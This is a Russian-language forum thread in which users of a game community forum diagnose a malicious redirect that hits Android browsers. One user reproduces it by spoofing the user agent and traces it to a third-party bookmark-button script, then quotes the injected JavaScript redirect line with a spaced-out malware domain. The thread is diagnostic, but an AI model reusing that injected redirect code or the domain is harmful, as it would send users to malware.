[kinaran]

Android, Firefox
При переходах по ссылкам внутри форума браузер упорно переход на эту страницу.

Переадресация производится не сразу при открытии форума в мобильном браузере, а по какому-то алгоритму, чтобы не палиться. Где-то на сайте/форуме внедрён вредоносный код.

p.s. переадресует на "w e b o n l i n e s точка c o m"

[KOTEUKA]

Цитата:

Сообщение от kinaran

Android, Firefox

хром андроидский тоже эту ссылку выдаёт

[DESTRODAMA]

такое же было, только с *оранжевой белочкой*....
помогло скидывание(форматирование) всей памяти(кроме системной - там был сделан сброс)
ну и конечно установка антивируса Dr. Web Light.
Сейчас таких проблем нет.
Имхо мне кажется - проблема не в том, что чтото внедрено, а чтото в ваши браузеры встроено - надстройки)

[kinaran]

DESTRODAMA, если бы это был Internet Explorer, можно было бы согласиться с вами. Но не Firefox на Android, с единственным дополнением Adblock. Тем более, что и на другом браузере тоже пернадресовало. Это делается на стороне сервера...

[Trolinich]

Цитата:

Сообщение от kinaran

Это делается на стороне сервера...

тогда почему оно провлется только на мобильных и на андроиде?)

[Кувалда]

на винфоне и айосе ниче подобного никогда не было... вывод: выбросьте андройд к чертям собачьим

[kinaran]

Потому, что вирус под андроид написан.
Потому, что сервер определяет по идентификатору браузера его платформу и показывает только для андроид.
Почему показывает не всегда - чтобы админами не было замечено.

Windows тоже выбросьте, самый большая среда для вирусов. И про л2 забудьте тогда ;)

[Кувалда]

Цитата:

Сообщение от kinaran

И про л2 забудьте тогда ;)

и правда... что же мне делать,с телефона в ла2 не поиграю...

[Trolinich]

совсем зажрались, я смотрю, лезут с телефонов на сайт и еще возмущаются

[DESTRODAMA]

Цитата:

Сообщение от kinaran

DESTRODAMA, если бы это был Internet Explorer, можно было бы согласиться с вами. Но не Firefox на Android, с единственным дополнением Adblock. Тем более, что и на другом браузере тоже пернадресовало. Это делается на стороне сервера...

для вас видимо слово *надстройки* ассоциируются только с IE.
Поверьте, в других браузерах они тоже есть, только могут называться:
1)Сертификатами
2)Расширениями
3)Плагинами

+ такое может быть, что другие программы, которые вы наверняка качали, содержали в себе какую нибудь такую бредятину.
Если андроид на линукс, то это не значит что вирусов не словите - мир не стоит на месте и утопическая фраза *на линукс нет вирусов* уже дааааавно не канает)

--- Добавлено в 13:51 --- Предыдущее сообщение было написано в 13:47 ---

Цитата:

Сообщение от Кувалда

на винфоне и айосе ниче подобного никогда не было... вывод: выбросьте андройд к чертям собачьим

вспоминается фраза из фильма *Приключение Шурика*
Только речь не о несчастных случаях на стройке, а о вирусах на андроиде)

[KOTEUKA]

Цитата:

Сообщение от Trolinich

совсем зажрались, я смотрю, лезут с телефонов на сайт и еще возмущаются

то ли дело твоя деревня? там такого нету?

[Trolinich]

Цитата:

Сообщение от KOTEUKA

то ли дело твоя деревня? там такого нету?

конечно нету, это ж еще прошлый век! Или у вас еще до сих пор на андроиде сидят?

[Иисус]

Честно, разбираться не пытался, но когда на форум меги захожу антивирус всегда блочит какую-то вредоносную ссылку, захожу с FireFox с компа естественно, такое только на этом форуме.

[kinaran]

Цитата:

Сообщение от DESTRODAMA

для вас видимо слово *надстройки* ассоциируются только с IE.
Поверьте, в других браузерах они тоже есть, только могут называться:
1)Сертификатами
2)Расширениями
3)Плагинами

+ такое может быть, что другие программы, которые вы наверняка качали, содержали в себе какую нибудь такую бредятину.
Если андроид на линукс, то это не значит что вирусов не словите - мир не стоит на месте и утопическая фраза *на линукс нет вирусов* уже дааааавно не канает)[COLOR="Silver"]

Нет, вовсе нет. Android + Firefox мною упомянуты ещё раз, намекая на его ограниченные возможности по части плагинов и расширений. А вовсе не на линукс без вирусов.

Смотрите:

• берём чистую (наисвежеустановленную) виртуальную машину с Windows и Firefox
• удаляём ВСЕ куки и историю, для чистоты эксперимента;
• ставим плагин HttpFox для записи обмена с сервером;
• ставим плагин User Agent Switcher, добавляем туда User Agent от браузера на Android, Chrome или Firefox, без разницы;
• переключаем User Agent на андроидовый браузер, чтобы сервер думал, что мы с зашли телефона;
• включаем лог http;
• идём на наш сайт (zmega.com) и бродим по форуму пару минут;
• через некоторое время нас посылает на страницу обновления браузера, что и требовалось доказать.

Лог выложен тут, если кто понимает его содержимое.

Чтобы воспроизвести эту последовательность ещё раз, надо удалить все (конечно, нужны только какие-то конкретные из них, но какие - пока не ясно) куки и перезапустить браузер.

--- Добавлено в 19:13 --- Предыдущее сообщение было написано в 17:57 ---

Вот что нашлось сейчас:

Если разрешены скрипты с сайта odnaknopka (это кнопки "Добавить в закладки:" под сообщениями в теме), всё работает некоторое время как ожидалось.

Потом, через это некоторое время, и если браузер на Android, в конце скрипта появляется новый код:

Цитата:

(function(w) {
window.location = "h t t p: / / w e b w o n l i n e s . c o m / s/14305";
})(window);

Ещё через некоторое время (чтоб никто не заметил :) ) происходит ошибка загрузки этого скрипта и выполняется переадресация на вирус.
Вот такие дела...
Примеры скриптов, получаем в ходе этой последовательности